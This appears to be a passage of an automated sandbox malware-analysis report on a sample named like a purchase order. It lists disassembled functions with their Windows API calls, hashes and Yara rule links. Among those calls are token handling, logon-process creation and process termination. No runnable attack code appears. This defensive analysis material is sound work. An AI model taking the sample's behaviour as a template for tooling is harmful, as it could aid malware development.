                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearCopy$AllocInitString
                          • String ID:
                          • API String ID: 3859894641-0
                          • Opcode ID: e938f231fdaf5c794084daa6e0d0aa5b15ab044709c7b396464497a4dddec882
                          • Instruction ID: f8ec5b82bd70f80412e36d4f05ca04fde0fa31eac938f99e2edb337e2be54615
                          • Opcode Fuzzy Hash: e938f231fdaf5c794084daa6e0d0aa5b15ab044709c7b396464497a4dddec882
                          • Instruction Fuzzy Hash: FA51E831A00310BACF10AB65DC95B29B3A8EF45312F2484A7EE05DF295DB748C8CF796
                          Function 00F7910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F07620: _wcslen.LIBCMT ref: 00F07625
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00F794E5
                          • _wcslen.LIBCMT ref: 00F79506
                          • _wcslen.LIBCMT ref: 00F7952D
                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00F79585
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$FileName$OpenSave
                          • String ID: X
                          • API String ID: 83654149-3081909835
                          • Opcode ID: 71685ecfda6b8935b5f7388c710d00e6c5a892bfb7b5319b706faaf7fc296f0f
                          • Instruction ID: 62ea15dcca3e43e0bf742bc080293a70b22795642df251bdb6a38e3c182f5424
                          • Opcode Fuzzy Hash: 71685ecfda6b8935b5f7388c710d00e6c5a892bfb7b5319b706faaf7fc296f0f
                          • Instruction Fuzzy Hash: 96E1B4319083508FD724EF24C881A6AB7E4BF85314F04C56DF8899B3A2DB75ED45EB92
                          Function 00F1920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • BeginPaint.USER32(?,?,?), ref: 00F19241
                          • GetWindowRect.USER32(?,?), ref: 00F192A5
                          • ScreenToClient.USER32(?,?), ref: 00F192C2
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F192D3
                          • EndPaint.USER32(?,?,?,?,?), ref: 00F19321
                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F571EA
                            • Part of subcall function 00F19339: BeginPath.GDI32(00000000), ref: 00F19357
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                          • String ID:
                          • API String ID: 3050599898-0
                          • Opcode ID: e2c44125c2cc4ce312ee423b472fe0b9ac82087651a380361e2b4ab7ea023ddb
                          • Instruction ID: dd1d9b495a63e3ce017e7e534d8941be135a02d9f3d0bf8d54db440e9bcf91e7
                          • Opcode Fuzzy Hash: e2c44125c2cc4ce312ee423b472fe0b9ac82087651a380361e2b4ab7ea023ddb
                          • Instruction Fuzzy Hash: C841A131509304AFD710DF64DCA4FAA7BA9FB45361F14022AFA64871A1C7719885FBA2
                          Function 00F707EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F7080C
                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F70847
                          • EnterCriticalSection.KERNEL32(?), ref: 00F70863
                          • LeaveCriticalSection.KERNEL32(?), ref: 00F708DC
                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F708F3
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F70921
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                          • String ID:
                          • API String ID: 3368777196-0
                          • Opcode ID: b8a0027f0a8dae2f54877ac210cb6b7cfdfd48b7239cea6d977255287f3b2219
                          • Instruction ID: 3698f45ba4975b1bd26bf836e6ed343c42806a435e6b795917837b037a4af6e9
                          • Opcode Fuzzy Hash: b8a0027f0a8dae2f54877ac210cb6b7cfdfd48b7239cea6d977255287f3b2219
                          • Instruction Fuzzy Hash: 24416B71A00209EFDF149F54DC85AAA77B8FF04310F1480A6ED049B297DB34DE65EBA5
                          Function 00F981DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F5F3AB,00000000,?,?,00000000,?,00F5682C,00000004,00000000,00000000), ref: 00F9824C
                          • EnableWindow.USER32(00000000,00000000), ref: 00F98272
                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00F982D1
                          • ShowWindow.USER32(00000000,00000004), ref: 00F982E5
                          • EnableWindow.USER32(00000000,00000001), ref: 00F9830B
                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F9832F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: 525e0a22225de3b03babf9662ad3ba56f08c64fb693cba6b20773f99a6382677
                          • Instruction ID: 028252a8516e124dab15df553b91f3e4ecb6d388dea65aa09ada3c15afc493a0
                          • Opcode Fuzzy Hash: 525e0a22225de3b03babf9662ad3ba56f08c64fb693cba6b20773f99a6382677
                          • Instruction Fuzzy Hash: 55416634A01644AFEF25CF25DC95FE47BE1BB47764F184169E5084B262CB31A842EF51
                          Function 00F64C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00F64C95
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F64CB2
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F64CEA
                          • _wcslen.LIBCMT ref: 00F64D08
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F64D10
                          • _wcsstr.LIBVCRUNTIME ref: 00F64D1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                          • String ID:
                          • API String ID: 72514467-0
                          • Opcode ID: 39e2abb39cdb1bffb1b6c6d09290f5aa3af99773e77a3ee1f55c652e29ce30f8
                          • Instruction ID: aab751dff93ff4273e46680d0e4e19439223f8420899a413e157028d49457b7b
                          • Opcode Fuzzy Hash: 39e2abb39cdb1bffb1b6c6d09290f5aa3af99773e77a3ee1f55c652e29ce30f8
                          • Instruction Fuzzy Hash: 0221DB72A04214BBEB156B35EC49E7F7BACDF45760F10403AF909CA191DA65EC41B7A0
                          Function 00F7581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F03AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F03A97,?,?,00F02E7F,?,?,?,00000000), ref: 00F03AC2
                          • _wcslen.LIBCMT ref: 00F7587B
                          • CoInitialize.OLE32(00000000), ref: 00F75995
                          • CoCreateInstance.OLE32(00F9FCF8,00000000,00000001,00F9FB68,?), ref: 00F759AE
                          • CoUninitialize.OLE32 ref: 00F759CC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 3172280962-24824748
                          • Opcode ID: 74672d48d4285035f2313065be34fb8098a5d95187171bcc5c9e0fe5d58cb216
                          • Instruction ID: 7aae81c6e7be86356fc6082dda70d581b03922d1a8dfa89a014a0b27063e5c59
                          • Opcode Fuzzy Hash: 74672d48d4285035f2313065be34fb8098a5d95187171bcc5c9e0fe5d58cb216
                          • Instruction Fuzzy Hash: F5D15671A047019FC714DF14C880A2AB7F5EF89B24F14885EF8899B3A1D775EC45EB92
                          Function 00F6175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F60FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F60FCA
                            • Part of subcall function 00F60FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F60FD6
                            • Part of subcall function 00F60FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F60FE5
                            • Part of subcall function 00F60FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F60FEC
                            • Part of subcall function 00F60FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F61002
                          • GetLengthSid.ADVAPI32(?,00000000,00F61335), ref: 00F617AE
                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F617BA
                          • HeapAlloc.KERNEL32(00000000), ref: 00F617C1
                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F617DA
                          • GetProcessHeap.KERNEL32(00000000,00000000,00F61335), ref: 00F617EE
                          • HeapFree.KERNEL32(00000000), ref: 00F617F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                          • String ID:
                          • API String ID: 3008561057-0
                          • Opcode ID: 0b2d62dc8544b4cd43b63fc46d78f671a8a0a70483af470e8daa9448fa31dee1
                          • Instruction ID: 593e11715351cb9d1a3c09ab219eae649592c8e2d7d5aeb5fcf9c05a5a94b59a
                          • Opcode Fuzzy Hash: 0b2d62dc8544b4cd43b63fc46d78f671a8a0a70483af470e8daa9448fa31dee1
                          • Instruction Fuzzy Hash: 1211BE32900209FFDB109FA4CC49BAF7BA9FB42365F184019F44197211D73AAA40EBA0
                          Function 00F614CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F614FF
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00F61506
                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F61515
                          • CloseHandle.KERNEL32(00000004), ref: 00F61520
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F6154F
                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F61563
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 1413079979-0
                          • Opcode ID: 3e677426a0c9fd2cb688d2a8419ad46f891956f57e1ec71c95dee91e58f00eec
                          • Instruction ID: 58690c52cb185fe32cab1f3971c67035557b69abc978c113dd47db871dd6a92b
                          • Opcode Fuzzy Hash: 3e677426a0c9fd2cb688d2a8419ad46f891956f57e1ec71c95dee91e58f00eec
                          • Instruction Fuzzy Hash: 5D11297290120DABDF11CFA8EE49FDE7BA9FF49754F084015FA05A2060C3758E60EBA1
                          Function 00F23382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,00F23379,00F22FE5), ref: 00F23390
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F2339E
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F233B7
                          • SetLastError.KERNEL32(00000000,?,00F23379,00F22FE5), ref: 00F23409
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: cd9e88b5bd1b96eb3965d9bab541e12fd12e5f3fe516cbfd9fa93e4f97130f3b
                          • Instruction ID: 34f8c1ccaf4405d8dc71738a4f07b88285b175ea7bf9e1c6d727f0fe562a0282
                          • Opcode Fuzzy Hash: cd9e88b5bd1b96eb3965d9bab541e12fd12e5f3fe516cbfd9fa93e4f97130f3b
                          • Instruction Fuzzy Hash: B30147B3A09335BEAA2477747C86E273E98EB05779720022AF414C21F0EF1D4E037184
                          Function 00F32D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,00F35686,00F43CD6,?,00000000,?,00F35B6A,?,?,?,?,?,00F2E6D1,?,00FC8A48), ref: 00F32D78
                          • _free.LIBCMT ref: 00F32DAB
                          • _free.LIBCMT ref: 00F32DD3
                          • SetLastError.KERNEL32(00000000,?,?,?,?,00F2E6D1,?,00FC8A48,00000010,00F04F4A,?,?,00000000,00F43CD6), ref: 00F32DE0
                          • SetLastError.KERNEL32(00000000,?,?,?,?,00F2E6D1,?,00FC8A48,00000010,00F04F4A,?,?,00000000,00F43CD6), ref: 00F32DEC
                          • _abort.LIBCMT ref: 00F32DF2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: ddc9ddcf52ebdbbec95958ec2209e6a4ca1f3d1d3bd563c446c88b9d0baeef34
                          • Instruction ID: 13deaba4b4433e1ef2d33d94a0724f440afdfdea2c8e7825518799e16881cb13
                          • Opcode Fuzzy Hash: ddc9ddcf52ebdbbec95958ec2209e6a4ca1f3d1d3bd563c446c88b9d0baeef34
                          • Instruction Fuzzy Hash: 3CF0FC329056106BC6927739BC06F1F3569AFC17B1F240419F828D32D2EF38D80271B0
                          Function 00F98A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F19639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F19693
                            • Part of subcall function 00F19639: SelectObject.GDI32(?,00000000), ref: 00F196A2
                            • Part of subcall function 00F19639: BeginPath.GDI32(?), ref: 00F196B9
                            • Part of subcall function 00F19639: SelectObject.GDI32(?,00000000), ref: 00F196E2
                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00F98A4E
                          • LineTo.GDI32(?,00000003,00000000), ref: 00F98A62
                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00F98A70
                          • LineTo.GDI32(?,00000000,00000003), ref: 00F98A80
                          • EndPath.GDI32(?), ref: 00F98A90
                          • StrokePath.GDI32(?), ref: 00F98AA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: 0afceb62a933c2c81c1465c9bbc06f0d012e4854b080fe0c8d9fb525df10df85
                          • Instruction ID: c401fef394a0edd21a11b967a960f1310d3e00c5c44fc80609cbfae903e46bfc
                          • Opcode Fuzzy Hash: 0afceb62a933c2c81c1465c9bbc06f0d012e4854b080fe0c8d9fb525df10df85
                          • Instruction Fuzzy Hash: F211C97644014DFFEF129F94DC88EAA7F6DEB08394F048012FA199A1B1C7719D55EBA0
                          Function 00F651FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 00F65218
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F65229
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F65230
                          • ReleaseDC.USER32(00000000,00000000), ref: 00F65238
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F6524F
                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F65261
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          • Opcode ID: bf2d2e1c77b597f3b635afcf5955c15a56feafae7de840d47aa63a99c8505fc6
                          • Instruction ID: 8d09c6ea4ad9e6436a630c313388aea6cdea76b498f1e21833dc36b76041f0b1
                          • Opcode Fuzzy Hash: bf2d2e1c77b597f3b635afcf5955c15a56feafae7de840d47aa63a99c8505fc6
                          • Instruction Fuzzy Hash: A3016275E00718BBEF109BA59C49E5EBFB8EF48751F044066FA05E7291D6709C04EFA0
                          Function 00F01BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F01BF4
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F01BFC
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F01C07
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F01C12
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F01C1A
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F01C22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: 9ad565618e2aaae1e61a6bbe862d84204239b1863983853e7c9f17b5abd8c3e9
                          • Instruction ID: ae6b7ccfc4d07c08df68912ab35e67bf7e701a21077cd3e9be69e20d98a55017
                          • Opcode Fuzzy Hash: 9ad565618e2aaae1e61a6bbe862d84204239b1863983853e7c9f17b5abd8c3e9
                          • Instruction Fuzzy Hash: 740167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                          Function 00F6EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F6EB30
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F6EB46
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00F6EB55
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6EB64
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6EB6E
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6EB75
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
